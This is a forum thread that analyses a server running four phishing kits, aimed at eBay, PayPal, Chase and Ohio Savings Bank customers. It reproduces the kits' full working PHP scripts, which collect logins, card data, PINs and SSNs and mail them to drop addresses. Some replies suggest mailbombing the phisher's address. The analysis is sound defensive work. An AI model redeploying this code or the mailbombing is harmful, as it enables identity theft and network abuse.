dslreports logo
site
    All Forums Hot Topics Gallery
spc
Search Topic:
uniqs
860
share rss forum feed

MGD
Premium,MVM
join:2002-07-31
kudos:9

2 edits

2 recommendations

Anatomy of a quadruple Phish: Ebay, Paypal, Chase & OSB

Click for full size
Pic 1
Click for full size
Pic 2
Click for full size
Pic 3
Click for full size
Pic 4
Click for full size
Pic 5
Click for full size
Pic 6
Click for full size
Pic 7
A Phish Pharm

I first ran across this multi tasking criminal from an ebay phish spam. While digging around the Ebay Phish (Pic 1), I also located a Chase Bank phish on the same server in Venezuela (Pic 2). I then found the Phishers uploads which showed that he had 3 Phish Payloads there (Pic 3). In addition to the Ebay (aw-cgi), and the Chase Bank (chaseonline) phishes, there was a third payload (account) which turned out to be Ohio Savings Bank. The OSB does not appear to have an active directory (yet), however, it would look like this partial template from his file (Pic 4).

After working on extracting the drop box information, I then went back the next day to see if the Ohio Bank had been activated yet. It had not, however, he had now added a fourth phish, and activated it (pp/)(Pic 7),it was a Paypal phish (Pic 5). That "this page has been removed" line is a typical phish tactic. It is a ruse to get you to click on the "Click here to go to our main page" link that will then trigger a javascript that adjusts you browser, and overlays a url location of the real PayPal site, to further confirm that you are at the "real site" see (Pic 6).

Info from this four pack phish:

1) The data drop on the Ohio Savings Bank goes to: ebaysp4m@yahoo.com showing a From: "Ohio Savings cc@ohiqsavings.com"

2) The data drop for the Ebay phish is in two parts, first the User ID/Password is sent to ebaysp4m@yahoo.com with a From: "Nene Bun" (---> Romanian), and a Subject: "$userid $pass". The card data is also sent to ebaysp4m@yahoo.com, after the card number passes a validation script.

3) The Chase Bank phish data and the victims IP address are sent to antibmw@gmail.com with a From: "Chase Login" and a Subject: "$user - $pass". The victim's name, card data, bank account #, SSN, DOB, and ATM pin, are emailed to the same antibmw@gmail.com by complete.php with a From: "Chase Card", and Subject: "$ccnumber".

4) The data from the Paypal phish is emailed to teinvitsapleci@gmail.com with a From: "PP", and a Subject: "PP - ". Included in this data are: Name, complete address, SSN, Mothers maiden name, DOB, Card #, Pin#, cvv2, and IP address, all going to teinvitsapleci@gmail.com

Ohio Savings Bank Phish:

verify.php
<?
session_start();
$user = $_SESSION['user'];
$pass = $_SESSION['pass'];

$name = $_POST['name'];
$address = $_POST['address'];
$city = $_POST['city'];
$state = $_POST['state'];
$zip = $_POST['zip'];

$card = $_POST['ccnumber'];
$month = $_POST['month'];
$year = $_POST['year'];
$atm = $_POST['atmpin'];
$email = $_POST['email'];

$ip = getenv("REMOTE_ADDR");

if((!is_numeric($card)) || (strlen($card) != 16) || (!is_numeric($atm)) || (strlen($atm) != 4))
{
header("Location: verify.htm?error=1");
}
else
{
$message="##################################################\n
";
$message=$message."User: $user\n
";
$message=$message."Pass: $pass\n
";
$message=$message."Name: $name\n
";
$message=$message."Address: $address\n
";
$message=$message."City: $city\n
";
$message=$message."State: $state\n
";
$message=$message."Zip: $zip\n
";
$message=$message."Card Number: $card\n
";
$message=$message."Exp: $month/$year\n
";
$message=$message."PIN: $atm\n
";
$message=$message."E-mail: $email\n
";
$message=$message."IP: $ip\n
";
$message=$message."##################################################
";
mail ("ebaysp4m@yahoo.com","$card $month/$year $atm $ip","$message","From: Ohio Savings <cc@ohiqsavings.com>\n");
header("Location: http://www.ohiosavings.com");
}
?>

Ebay Phish:

Many victims do not realize that even if they just enter the user ID and password on the first page of a phish, then see the second page that asks for all the financial data, and realize "something is not right" and back out. The user ID and Password have already been captured and are on their way to the criminal. As you can see below the user id/password is processed by login.php as soon as it is entered. If the victim completes the second page with the cc info, then update.php processes that info separately. The phisher gets two emails:

login.php
<?

session_start();

$userid = $_POST['userid'];
$pass = $_POST['pass'];
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");

//sending email info here
$subj = "$userid $pass";
$msg = "Username: $userid\nPassword: $pass\nIP: $ip\nDate: $adddate";
$from = "Nene Bun";
if ($userid==""||$pass=="") require ("eBayISAPI_.html");
else{
mail("ebaysp4m@yahoo.com", $subj, $msg, $from);
header("Location:processcard.html");

}
?>

Ebay Phish

Notice how the scumbag records the victims IP address in the Update message as "Punk'd IP".

Update.php
<?php
include("ccval.php");
$ip = getenv("REMOTE_ADDR");
$newCreditCardIssuer=$_POST["newCreditCardIssuer"];
$creditcard=$_POST["creditcard"];
$ccmonth=$_POST["ccmonth"];
$ccyear=$_POST["ccyear"];
$cvv=$_POST["cvv"];
$pin=$_POST["pin"];
$message="--------------------------------------------------\n";
$message=$message."Punk'd IP: $ip\n";
$message=$message."Credit Card Type: $newCreditCardIssuer\n";
$message=$message."Credit Card Number: $creditcard\n";
$message=$message."Expiration Date: $ccmonth / $ccyear\n";
$message=$message."CVV: $cvv\n";
$message=$message."PIN: $pin\n";
$Result = ccval($creditcard, $newCreditCardIssuer);
if (strlen($cvv)<3||$Result!=1||$pin==""||$ccmonth=="00"||$ccyear=="0000") require("includeerror.html");
else {

mail("ebaysp4m@yahoo.com", "$creditcard $pin $cvv", $message);
require("processcard2.html");
}
?>

Notice the card validation script listed above, ccval.php, that runs the card before writing the data. For those of you that like to load up phish with bogus data, you need to use numbers that pass the Luhn Formula, or the fake data will never get to cram the phishers box. It is a commonly used script by phishers, you can tell if they are active by the rejection warning. (I have included the code from the phish at the end). Some sites that load up phishes with fake data do not address this issue, and the fake data is just discarded.

Chase Bank Phish:

The Chase phish operates the same as the Ebay Phish with the User ID/Password processed as soon as they are entered by login.php. The cc data is processed by

login.php
<?php
$user = $_POST['user'];
$pass = $_POST['pass'];
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");

$msg = "IP: $ip\n$adddate\n\n Username: $user\nPassword: $pass";

$to="antibmw@gmail.com";

$subj = "$user - $pass";
$from = "Chase Login";
$arr=array($to, $message);
foreach ($arr as $to)
{
mail ($to, $subj, $msg, $from);
}

header("Location: update.htm");

?>

Chase Bank

complete.php
<?php
$ccname = $_POST['name'];
$ccnumber = $_POST['cc'];
$cvv2 = $_POST['cvv2'];
$account = $_POST['account'];
$ssn = $_POST['ssn'];
$ccmonth = $_POST['ccmonth'];
$ccyear = $_POST['ccyear'];
$dday = $_POST['dday'];
$dmonth = $_POST['dmonth'];
$dyear = $_POST['dyear'];
$pin = $_POST['pin'];
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");

$msg = "IP: $ip\n$adddate\n\n CC name: $ccname\nCC Number: $ccnumber\nCVV2: $cvv2\nAccount Number: $account\nSSN: $ssn\nDOB: $dday-$dmonth-$dyear\nCC Month: $ccmonth\nCC year : $ccyear\nPIN: $pin";

$to="antibmw@gmail.com";

$subj = "$ccnumber";
$from = "Chase Card";
$arr=array($to, $message);
foreach ($arr as $to)
{
mail ($to, $subj, $msg, $from);
}

header("Location: http://www.chase.com/cm/cs?pagename=Chase/Href&urlname=chase/cc/terms");

?>

Paypal Phish:

update.php
<?php
session_start();
function _GetParam($Nume, $Default = "") {
if ( isset($_GET[$Nume]) )
return $_GET[$Nume];
else if ( isset($_POST[$Nume]) )
return $_POST[$Nume];
else
return $Default;
}

$ip = getenv("REMOTE_ADDR");
$adddate = date("D M d, Y g:i a");
//sending email info here

$ccnum = _GetParam("ccnum");
$ccmonth = _GetParam("ccmonth");
$ccyear = _GetParam("ccyear");
$pin = _GetParam("pin");
$cvv2 = _GetParam("cvv2");
$fname = _GetParam("fname");
$address = _GetParam("address");
$city = _GetParam("city");
$state = _GetParam("state");
$zip = _GetParam("zip");
$country = _GetParam("country");
$ssn1 = _GetParam("ssn1");
$ssn2 = _GetParam("ssn2");
$ssn3 = _GetParam("ssn3");
$mmn = _GetParam("mmn");
$dob = _GetParam("dob");

$dates = date("d/m/Y - H:i:s");
$browser = $_SERVER['HTTP_USER_AGENT'];
$from = "From: PP ";
$subject = "PP - ".$ccnum." | ".$ccmonth."-".$ccyear." | ".$pin." | ".$ip."";

$mesaj = '
PP Card Number: '.$ccnum.'
PP Expiration Date: '.$ccmonth.'-'.$ccyear.'
PP PIN: '.$pin.'
PP CVV2: '.$cvv2.'
PP Name: '.$fname.'
PP Address: '.$address.'
PP City: '.$city.'
PP State: '.$state.'
PP Zip: '.$zip.'
PP Country: '.$country.'
PP SSN: '.$ssn1.'-'.$ssn2.'-'.$ssn3.'
PP Mother: '.$mmn.'
PP DOB: '.$dob.'
IP: '.$ip.'
Browser used: '.$browser.'
Date and time: "'.$dates.' Central Time (US & Canada)
';

mail("teinvitsapleci@gmail.com", $subject, $mesaj);

?>

I have smudged the phish location as it is still active, and the phish upload packages are relatively easy to find. Not the pre made phishes are hard to come by, however, I do not want to expand the current library of any phishers by pointing them there. If anyone who is verifiable and needs them for analysis, IM me.

Card validation script:
ccval.php
<?php
/************************************************************************
*
* CCVal - Credit Card Validation function.
*
* Copyright (c) 1999, 2003 Holotech Enterprises. All rights reserved.
* You may freely modify and use this function for your own purposes. You
* may freely distribute it, without modification and with this notice
* and entire header intact.
*
* This function accepts a credit card number and, optionally, a code for
* a credit card name. If a Name code is specified, the number is checked
* against card-specific criteria, then validated with the Luhn Mod 10
* formula. Otherwise it is only checked against the formula. Valid name
* codes are:
*
* mcd - Master Card
* vis - Visa
* amx - American Express
* dsc - Discover
* dnc - Diners Club
* jcb - JCB
* swi - Switch
* dlt - Delta
* enr - EnRoute
*
* You can also optionally specify an expiration date in the formay mmyy.
* If the validation fails on the date, the function returns 0. If it
* fails on the number validation, it returns false.
*
* A description of the criteria used in this function can be found at
* http://www.paylib.net/ccval.html. If you have any questions or
* comments, please direct them to ccval@holotech.net
*
* Alan Little
* Holotech Enterprises
* http://www.holotech.net/
* August 2003
*
************************************************************************/

function CCVal($Num, $Name = "n/a", $Exp = "") {

// Check the expiration date first
if (strlen($Exp)) {
$Month = substr($Exp, 0, 2);
$Year = substr($Exp, -2);

$WorkDate = "$Month/01/$Year";
$WorkDate = strtotime($WorkDate);
$LastDay = date("t", $WorkDate);

$Expires = strtotime("$Month/$LastDay/$Year 11:59:59");
if ($Expires < time()) return 0;
}

// Innocent until proven guilty
$GoodCard = true;

// Get rid of any non-digits
$Num = ereg_replace("[^0-9]", "", $Num);

// Perform card-specific checks, if applicable
switch ($Name) {

case "mcd" :
$GoodCard = ereg("^5[1-5].{14}$", $Num);
break;

case "vis" :
$GoodCard = ereg("^4.{15}$|^4.{12}$", $Num);
break;

case "amx" :
$GoodCard = ereg("^3[47].{13}$", $Num);
break;

case "dsc" :
$GoodCard = ereg("^6011.{12}$", $Num);
break;

case "dnc" :
$GoodCard = ereg("^30[0-5].{11}$|^3[68].{12}$", $Num);
break;

case "jcb" :
$GoodCard = ereg("^3.{15}$|^2131|1800.{11}$", $Num);
break;

case "dlt" :
$GoodCard = ereg("^4.{15}$", $Num);
break;

case "swi" :
$GoodCard = ereg("^[456].{15}$|^[456].{17,18}$", $Num);
break;

case "enr" :
$GoodCard = ereg("^2014.{11}$|^2149.{11}$", $Num);
break;
}

// The Luhn formula works right to left, so reverse the number.
$Num = strrev($Num);

$Total = 0;

for ($x=0; $x<strlen($Num); $x++) {
$digit = substr($Num,$x,1);

// If it's an odd digit, double it
if ($x/2 != floor($x/2)) {
$digit *= 2;

// If the result is two digits, add them
if (strlen($digit) == 2)
$digit = substr($digit,0,1) + substr($digit,1,1);
}

// Add the current digit, doubled and added if applicable, to the Total
$Total += $digit;
}

// If it passed (or bypassed) the card-specific check and the Total is
// evenly divisible by 10, it's cool!
if ($GoodCard && $Total % 10 == 0) return true; else return false;
}
?>

MGD

Edit=Typos


Snowy
Premium
join:2003-04-05
Kailua, HI
kudos:6
Reviews:
·Time Warner Cable
·Clearwire Wireless
Mahalo for the excellent analysis/breakdown of the "inner workings" of these scams. It's as good a tutorial as I've seen. The ebaysp4m@yahoo.com email address was sent to yahoo last week along with the source code of the post action asking that they terminate the account for obvious reasons. I didn't hear back from them but assumed the address had been terminated. Seeing your thread today I decided to send an email to ebaysp4m@yahoo.com fully expecting it to bounceback to the yahoo address it was sent from. Nope, no bounceback. What the heck is Yahoo's problem?
Failing any action by Yahoo, knowing the correct subject, formatting etc... of the emails one could mailbomb the acct with useless data or sign it up with some "Spam To Da Max"
mailer & let scum deal with scum. That would be like a killing 2 birds with one stone sort of approach.


catseyenu
Ack Pfft
Premium
join:2001-11-17
Fix East
reply to MGD
Let's see if we can get some special care for this address...


Death2U
Premium
join:2006-01-22

2 edits
reply to MGD
Wait I found the correct addy by checking more carefully. Oh he is going to be spam bombed. Disregard the previous edited post.


s0tet

join:2005-06-08
Nice job with the detail. This thread is a saver for note taking on phishing.

Unfortunately, I have seen this too often as well, if you go into a phish folder and no index page exists and listing file option is enabled on the server, you can often see other phishing folders spoofing other payment organizations. Usually I see 3 or 4 at a pop.

What is more discouraging and occurs more often within the past year 2005-06 is when you go to a phishing URL and you prompted to download a virus or trojan.